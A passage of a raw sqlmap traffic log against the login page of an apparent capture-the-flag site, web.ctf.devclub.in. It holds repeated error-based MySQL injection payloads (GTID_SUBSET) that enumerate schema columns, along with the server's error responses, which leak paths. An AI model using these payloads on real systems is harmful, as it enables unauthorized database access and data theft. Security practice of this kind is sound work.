			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#13]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 309
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x494e4e4f44425f4255464645525f50414745%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C7210%29--%20WFdo

HTTP response [#13] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:51 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363336</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#14]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 317
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x494e4e4f44425f4255464645525f504147455f4c5255%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C3973%29--%20NgDL

HTTP response [#14] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:52 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363336</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#15]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 321
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x494e4e4f44425f4255464645525f504f4f4c5f5354415453%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C3109%29--%20elLy

HTTP response [#15] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:52 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363400</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#16]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 293
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x494e4e4f44425f434d50%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C6214%29--%20SWIF

HTTP response [#16] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:52 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363208</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#17]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 299
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x494e4e4f44425f434d504d454d%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C7162%29--%20pyVU

HTTP response [#17] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:52 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363208</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#18]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 311
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x494e4e4f44425f434d504d454d5f5245534554%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C7200%29--%20dtWk

HTTP response [#18] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:52 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363336</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#19]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 313
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x494e4e4f44425f434d505f5045525f494e444558%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C2660%29--%20QMDh

HTTP response [#19] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:53 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363336</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#20]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 325
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x494e4e4f44425f434d505f5045525f494e4445585f5245534554%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C1558%29--%20BpJN

HTTP response [#20] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:53 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363400</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#21]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 305
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x494e4e4f44425f434d505f5245534554%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C9541%29--%20Edup

HTTP response [#21] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:53 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363336</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#22]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 319
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x494e4e4f44425f46545f4245494e475f44454c45544544%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C3268%29--%20pFvd

HTTP response [#22] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:53 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363336</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#23]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 305
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x494e4e4f44425f46545f434f4e464947%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C1302%29--%20OKvm

HTTP response [#23] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:53 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363336</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#24]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 325
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x494e4e4f44425f46545f44454641554c545f53544f50574f5244%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C3888%29--%20weyt

HTTP response [#24] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363400</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#25]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 307
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x494e4e4f44425f46545f44454c45544544%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C1327%29--%20nKeI

HTTP response [#25] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
